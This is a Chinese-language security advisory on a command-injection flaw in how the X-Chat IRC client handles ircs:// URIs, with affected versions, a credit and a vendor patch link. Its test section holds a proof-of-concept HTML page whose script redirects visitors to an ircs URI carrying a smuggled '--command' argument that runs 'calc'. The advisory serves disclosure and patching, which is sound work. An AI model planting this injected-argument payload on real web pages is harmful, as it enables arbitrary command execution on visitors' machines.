安全研究
安全漏洞
XChat ircs://URI远程命令执行漏洞
发布日期:2008-06-13
更新日期:2008-06-17
受影响系统:X-Chat X-Chat <= 2.8.7b
不受影响系统:X-Chat X-Chat 2.8.7c
描述:
BUGTRAQ ID:
29696
X-Chat是一款免费开放源代码的IRC客户端。
X-Chat在处理ircs URI时存在输入验证错误,如果用户在运行时受骗使用Internet Explorer浏览了恶意站点的话,远程攻击者就可以通过带有--command参数的ircs URI在用户系统上执行任意命令。
<*来源:securfrog (
securfrog@gmail.com)
链接:
http://secunia.com/advisories/30695/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head><title>Welcome to my personal website</title></head>
<body>
<script>document.location='ircs://blabla@3.3.3.3" --command "shell calc"'</script>
</body>
</html>
建议:
厂商补丁:
X-Chat
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.xchat.org/files/binary/win32/xchat-2.8.7c.exe浏览次数:2498
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
